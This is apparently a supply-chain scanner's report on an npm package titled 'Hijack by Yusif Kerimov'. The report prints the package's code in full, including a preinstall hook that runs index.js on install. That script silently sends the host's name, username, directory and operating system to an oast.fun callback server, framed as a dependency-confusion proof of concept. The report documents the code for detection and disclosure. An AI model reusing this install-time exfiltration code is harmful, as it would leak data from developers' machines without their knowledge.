// npm package
retail-location-strategy-frontend
Hijack by Yusif Kerimov
versions
2
maintainers
1
license
ISC
first publish
2026-05-30
publisher
yusif-kerimov
tarball
1,328 B
AUTO-PUBLISHED·2 versions indexed·latest published 2026-05-30
// exfil path
what is read → where it shipssteals
- ○ home dir
- ○ system info
sends to
- ⇢ ulehcosybxwttseibbych07wphlyoxhfr.oast.fun(oast.fun)
// offending code· @1.1.2· 1 file flagged
llm: malicious · 0.95→ Sends to suspicious destination(s): ulehcosybxwttseibbych07wphlyoxhfr.oast.fun.
- @1.1.2··AUTO-PUBLISHED·publisher: yusif-kerimovheuristic 55/100static flags 4llm malicious (0.95) via ollamainstall-scripts:preinstallnew-publisher:7dreads-homedirreads-system-infooast-callback-domaindest-via-hostname-var
→ Sends to suspicious destination(s): ulehcosybxwttseibbych07wphlyoxhfr.oast.fun.
// offending code· 1 file flaggedpatterns: 4
--- install scripts --- ### preinstall node index.js --- package/index.js (excerpt) --- const os = require('os'); const http = require('http'); const path = require('path'); try { // Yalnız zəifliyin icra olunduğu mühiti təhlükəsiz şəkildə sübut edən məlumatlar const data = JSON.stringify({ poc: "Dependency Confusion Verification", hostname: os.hostname(), username: os.userInfo().username, // Yalnız istifadəçi adı (bütün userInfo massivi yox) current_dir: __dirname, // Faylın işə düşdüyü qovluq yolu platform: os.platform() // Əməliyyat sistemi (linux, win32 və s.) }); const options = { hostname: 'ulehcosybxwttseibbych07wphlyoxhfr.oast.fun', // Sənin şəxsi server ünvanın port: 80, path: '/log', method: 'GET', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) } }; const req = http.request(options); req.write(data); req.end(); } catch (e) { // Hər hansı xətada sistem sessiz qalır ki, daxili build qırılmasın } --- dynamic destinations --- → ulehcosybxwttseibbych07wphlyoxhfr.oast.fun (via hostname-var) --- package.json (entry) --- { "name": "retail-location-strategy-frontend", "version": "1.1.2", "description": "Hijack by Yusif Kerimov", "license": "ISC", "author": "Yusif Kerimov", "type": "commonjs", "main": "index.js", "scripts": { "preinstall": "node index.js", "test": "echo \"Error: no test specified\" && exit 1" } } --- index.js (entry) --- const os = require('os'); const http = require('http'); const path = require('path'); try { // Yalnız zəifliyin icra olunduğu mühiti təhlükəsiz şəkildə sübut edən məlumatlar const data = JSON.stringify({ poc: "Dependency Confusion Verification", hostname: os.hostname(), username: os.userInfo().username, // Yalnız istifadəçi adı (bütün userInfo massivi yox) current_dir: __dirname, // Faylın işə düşdüyü qovluq yolu platform: os.platform() // Əməliyyat sistemi (linux, win32 və s.) }); const options = { hostname: 'ulehcosybxwttseibbych07wphlyoxhfr.oast.fun', // Sənin şəxsi server ünvanın port: 80, path: '/log', method: 'GET', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) } }; const req = http.request(options); req.write(data); req.end(); } catch (e) { // Hər hansı xətada sistem sessiz qalır ki, daxili build qırılmasın }
